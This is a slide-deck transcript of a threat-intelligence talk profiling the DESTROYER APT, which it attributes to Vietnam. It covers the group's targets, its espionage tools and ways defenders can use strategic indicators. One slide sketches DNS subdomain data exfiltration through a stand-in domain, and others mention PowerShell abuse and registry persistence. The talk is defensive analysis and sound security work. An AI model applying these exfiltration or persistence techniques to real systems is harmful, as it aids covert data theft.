1 / 17

DESTROYER : Why Intelligence Matters in InfoSec Operations

DESTROYER : Why Intelligence Matters in InfoSec Operations. John Holland. Managed Adversary and Threat Intelligence (MATI). Principal Cyber Intelligence Analyst. Outline. 1. Why Intelligence Matters. Why APTs Matter. DESTROYER Overview. Applying Intelligence. 2. 3. 4.

azura
Download Presentation

DESTROYER : Why Intelligence Matters in InfoSec Operations

An Image/Link below is provided (as is) to download presentation Download Policy: Content on the Website is provided to you AS IS for your information and personal use and may not be sold / licensed / shared on other websites without getting consent from its author. Content is provided to you AS IS for your information and personal use only. Download presentation by click this link. While downloading, if for some reason you are not able to download a presentation, the publisher may have deleted the file from their server. During download, if you can't get a presentation, the file might be deleted by the publisher.

E N D

Presentation Transcript

  1. DESTROYER: Why Intelligence Matters in InfoSec Operations John Holland Managed Adversary and Threat Intelligence (MATI) Principal Cyber Intelligence Analyst

  2. Outline 1 Why Intelligence Matters Why APTs Matter DESTROYER Overview Applying Intelligence 2 3 4

  3. Why Intelligence Matters

  4. Why Intelligence Matters Increased Temporal Distance Tool-basedProbing Global Reconnaissance MD5 Hash Options:Monitoring/Detection+Incident Response Options:Vulnerability Management+Perimeter Defense Options:Intelligence Operations(CI)

  5. Why Understanding APTs Matters

  6. Why Understanding APTs Matter Develop leading Tactics, Techniques, and Procedures (TTP) Operate with impunity TTPs proliferate

  7. Actor Profile:DESTROYER

  8. DESTROYER Overview Sponsorship Almost certainly acting on behalf of Vietnamese government (circa 2014) Supporting Evidence Targeting political dissidents and domestic media Targeting foreign companies operating in country Targeting foreign companies in areas of strategic interest to Vietnam

  9. DESTROYER Targeting Targeted entities include: • Political dissidents and media • Foreign-government diplomatic posts • Automotive manufacturing • Financial institutions • Educational institutions

  10. DESTROYER Intentions Focus • Creating economic advantage • Regional political maneuver Supporting Evidence • TTP align with espionage-centric intent • Custom backdoors allow for data exfiltration (DNS subdomains) • ColbaltStrike “Malleable C2” supports covert data exfiltration • Operations track with economic and political themes • Supporting extraordinary due diligence • Targets’ data not easily monetized

  11. DNS Subdomain Exfiltration <your data>.badguys.com

  12. Auto Manufacturing Activity Noteworthy Observations • Observed concerted focus on global automotive manufacturing (Dec 2018-current) • Targeted at least (5) auto-manufacturers with regional operations • India, Germany, United States, Japan • Coincides with ramp-up of domestic automobile manufacturing Also noteworthy • Massive domestic production of automobile parts • No observed targeting to date

  13. Going Beyond Technical Indicators

  14. Identifying the Indicators • Technical/Tactical Level • IP addresses • Domain/URL • Hashes • Operational level • Reg Keys • PowerShell • Scheduled Tasks • Strategic level • Press Releases • Media Statements Addressed by Technology Easily Changed (Rapidly) Less “What”--More “How” Difficult + Expensive to Change Maximum Temporal Distance Usually… Highly Visible

  15. Applying the Intelligence • Living Off the Land techniques on the rise • PowerShell exploitation • Easily monitored with Windows logging capability • Requires activation and monitoring schema • Registry Keys used for persistence • RK not standard in data feeds • Native Windows logging capability • Globally visible indicators • Press releases • Financial statements (forward looking) Operational Strategic

  16. Closing Thoughts • IOCs alone tell you you’re in trouble • The wrong IOCs will let you know when it’s too late • You may never be targeted by an APT

  17. Thank You! John Holland john_holland@Symantec.com

More Related